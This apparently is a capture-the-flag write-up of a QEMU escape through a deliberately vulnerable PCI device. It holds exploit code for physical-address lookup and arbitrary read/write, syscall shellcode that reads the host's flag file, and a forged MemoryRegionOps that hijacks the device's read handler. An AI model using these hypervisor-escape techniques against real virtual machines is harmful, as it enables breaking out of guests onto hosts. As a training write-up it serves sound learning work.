CloundInpect was a hypervisor exploitation challenge I did for the Hack.lu event. I didn’t succeed to flag it within the 48 hours :(. But anyway I hope this write up will be interesting to read! The related files can be found right here
After Whiterock released it’s trading bot cloud with special Stonks Sockets another hedge fund, Castel, comes with some competition. The special feature here is called “cloudinspect”. The flag is located right next to the hypervisor. Go get it!
Vulnerable PCI device
We got several files:
1 2
$ ls build_qemu.sh diff_chall.txt flag initramfs.cpio.gz qemu-system-x86_64 run_chall.sh vmlinuz-5.11.0-38-generic
Apparently, according to the diff_chall.txt , the provided qemu binary is patched with some vulnerable code. Let’s take a look at the diff file:
The first thing I did when I saw this was to check out how memory_region_init_io and pci_register_bar functions work. It sounds a bit like like a kernel device which registers a few handlers for basic operations like read / write / ioctl. Very quickly I found two write up from dangokyo this one and this other one, I recommend you to check it out, they are pretty interesting and well written.
PCI stands for Peripheral Component Interconnect, that’s a standard that describes the interactions between the cpu and the other physical devices. The PCI device handles the interactions between the system and the physical device. To do so, the PCI handler is providing a physical address space to the kernel, reachable through the kernel abstractions from a particular virtual address space. This address can be used to cache some data, but that’s mainly used to request a particular behavior from the kernel to the physical devices. These requests are written at a well defined offset in the PCI address space, that are the I/O registers. And in the same way, the devices are waiting for some values at these locations to trigger a particular behavior. Check out this and this to learn more about PCI devices!
Now we know a bit more about PCI devices, we can see that the patched code is a PCI interface between the linux guest operating system and .. nothing. That’s just a vulnerable PCI device which allows us to read and write four I/O registers (CNT, SRC, CMD and DST). According to these registers, we can read and write at an arbitrary location. There is a check about the size we’re requesting for read / write operations at a particular offset from the dmabuf base address, but since we control the offset it does not matter.
To write these registers from userland, we need to mmap the right resource file corresponding to the PCI device. Then we just have to read or write the mapped file at an offset corresponding to the the register we want to read / write. Furthermore, the arbitrary read / write primitives provided by the device need to read to / from a memory area from its physical address the data we want to read / write.
The resource file can be found by getting a shell on the machine to take a look at the output of the lspci command.
1 2 3 4 5 6
/ # lspci -v 00:01.0 Class 0601: 8086:7000 00:00.0 Class 0600: 8086:1237 00:01.3 Class 0680: 8086:7113 00:01.1 Class 0101: 8086:7010 00:02.0 Class 00ff: 1337:1337
The output of the command is structured like this:
1 2 3 4
Field 1 : 00:02.0 : bus number (00), device number (02) and function (0) Field 2 : 00ff : device class Field 3 : 1337 : vendor ID Field 4 : 1337 : device ID
According to the source code of the PCI device, the vendor ID and the device ID are 0x1337, the resource file corresponding to the device is so /sys/devices/pci0000:00/0000:00:02.0/resource0.
Device interactions
What we need to interact with the device is to get the physical address of a memory area we control, which would act like a shared buffer between our program and the PCI device. To do so we can mmap a few pages, malloc a buffer or just allocate onto the function’s stackframe a large buffer. Given that I was following the thedangokyo’s write up, I just retrieved a few functions he was using and especially for the shared buffer.
The function used to get the physical address corresponding to an arbitrary pointer is based on the /proc/self/pagemap pseudo-file, for which you can read the format here. The virt2phys function looks like this:
uint64_tvirt2phys(void* p) { uint64_t virt = (uint64_t)p; assert((virt & 0xfff) == 0); int fd = open("/proc/self/pagemap", O_RDONLY); if (fd == -1) perror("open"); uint64_t offset = (virt / 0x1000) * 8; // the pagemap associates each mapped page of the virtual address space // with its PTE entry, the entry corresponding to the page is at address / PAGE_SZ // and because that's an array of 64 bits entry, to access the right entry, the // offset is multiplied per 8. lseek(fd, offset, SEEK_SET); uint64_t phys; if (read(fd, &phys, 8 ) != 8) perror("read"); assert(phys & (1ULL << 63)); // asserts the bit IS_PRESENT is set phys = (phys & ((1ULL << 54) - 1)) * 0x1000; // flips out the status bits, and shifts the physical frame address to 64 bits return phys; }
To interact with the device we can write the code right bellow:
mlock(dmabuf, 0x1000); // trigger PAGE_FAULT to acually map the page dmabuf_phys_addr = virt2phys(dmabuf); // grab physical address according to pagemap printf("DMA buffer (virt) @ %p\n", dmabuf); printf("DMA buffer (phys) @ %p\n", (void*)dmabuf_phys_addr); }
Now we can interact with the device we got two primitive of arbitrary read / write. The read_offt and write_dmabuf functions permit us to read / write a 8 bytes to an arbitrary offset from the dmabuf object address.
Exploitation
I did a lot of things which didn’t worked, so let’s summarize all my thoughts:
If we leak the object’s address, we can write at any location for which we know the base address, for example overwrite GOT pointers (but it will not succeed because of RELRO).
If we take a look at all the memory areas mapped in the qemu process we can see very large memory area in rwx, which means if we can leak its address and if we can redirect RIP, we just have to write and jmp on a shellcode written in this area.
To achieve the leaks, given that the CloudInspectState structure is allocated on the heap, and that we can read / write at an arbitrary offset from the object’s address we can:
Scan heap memory for pointers to the qemu binary to leak the base address of the binary.
Scan heap memory for pointers to the heap itself (next, prev pointers for freed objects for example), and then compute the object’s address.
Scan heap memory to leak the rwx memory area
Scan all the memory area we can read to find a leak of the rwx memory area.
To redirect RIP I thought to:
Overwrite the destructor function pointer in the MemoryRegion structure.
Write in a writable area a fake MemoryRegionOps structure for which a certain handler points to our shellcode and make CloudInspectState.mmio.ops point to it.
According to the environment, scan the heap memory is not reliable at all. I succeed to leak the rwx memory area, the binary base address, the heap base address from some contiguous objects in the heap. To redirect RIP, for some reason, the destructor is never called, so we have to craft a fake MemoryRegionOps structure. And that’s how I read the flag on the disk. But the issue is that remotely, the offset between the heap base and the object is not the same, furthermore, the offset for the rwx memory leak is I guess different as well. So we have to find a different way to leak the object and the rwx memory area.
Leak some memory areas
To see where we can find pointers to the rwx memory area, we can make use of the search command in pwndbg:
Given that we don’t want to get the leak from heap because of the unreliability we can see that there are available leaks in a writable area of the binary in anon_559a89353, indeed the page address looks like a PIE based binary address or an heap address (but the address is not marked heap), and if we look more carefully, the page is contiguous to the last file mapped memory area. Now we can leak the rwx memory area, lets’ find a way to leak object’s address! I asked on the hack.lu discord a hint for this leak because didn’t have any idea. And finally it’s quite easy, we can just leak the opaque pointer in the MemoryRegion structure which points to the object’s address.
If I summarize we have:
A reliable leak of:
the object’s address with the opaque pointer
the binary base address (from the heap)
the rwx memory area (writable memory area that belongs to the binary).
I choose to write a shellcode to read the flag at leak_rwx + 0x5000, a known location we can easily read and print from the program. The shellcode is very simple:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
mov rax, 2 ; SYS_open push 0x67616c66 ; flag in little endian mov rdi, rsp ; pointer flag string mov rsi, 0 ; O_READ mov rdx, 0x1fd ; mode ? syscall mov rdi, rax ; fd xor rax, rax ; SYS_read lea rsi, [rip] ; pointer to the rwx memory area (cause we're executing code within) and rsi, 0xffffffffff000000 ; compute the base address add rsi, 0x5000 ; add the right offset mov rdx, 0x30 ; length of the flag to read syscall add rsp, 8; we pushed the flag str so we destroy it ret ; return to continue the execution
To write the shellcode at leak_rwx + 0x1000, we can directly trigger a large write primitive:
To cratf a fake MemoryRegionOps, I just read the original MemoryRegionOps structure, I edited the read handler, and I wrote it back, in a writable memory area, at leak_rwx+0x2000. Given that sizeof(MemoryRegionOps) is not superior to DMA_SIZE, I can read and write in one time. Then we got:
// Write it in the fake struct memcpy(&fake_ops, dmabuf, sizeof(struct MemoryRegionOps)); fake_ops.read = (leak_rwx + 0x1000); // Edit the handler we want to hook to make it point to the shellcode at leak_rwx + 0x1000
// patch it and write it @ leak_rwx + 0x2000 iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE); iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, leak_rwx - addr_obj + 0x2000); iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, sizeof(struct MemoryRegionOps)); iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, dmabuf_phys_addr); iowrite(CLOUDINSPECT_MMIO_OFFSET_TRIGGER, 0x300);
Hook mmio.ops + PROFIT
We just have to replace the original CoudInspect.mmio.ops pointer to a pointer to the fake_ops structure. Then, next time we send a read request, the shellcode will be executed! And we will just need to retablish the original CoudInspect.mmio.ops pointer to read the flag at leak_rwx+0x5000! Which gives:
write_dmabuf(-0xd0, leak_rwx+0x2000); // Set the pointer to the MemoryRegionOps to the fake MemoryRegionOps
ioread(0x37); // trigger the read handler we control, then the shellcode is // executed and the flag is written @ leak_rwx + 0x5000[enter link description here](cloudinspect)
// adresses are different because here is another execution on the remote challenge /* b'[*] CloudInspectState.mmio.ops.read () => jmp @ 7fe3dc001000\r\r\n' b'[*] CloudInspectState.mmio.ops = original ops\r\r\n' b'[*] Reading the flag @ 7fe3dc005000\r\r\n' b'flag: flag{cloudinspect_inspects_your_cloud_0107}\r\r\n' flag: flag{cloudinspect_inspects_your_cloud_0107} */
Thanks for the organizers for this awesome event! The other pwn challenges look like very interesting as well! You can the final exploit here.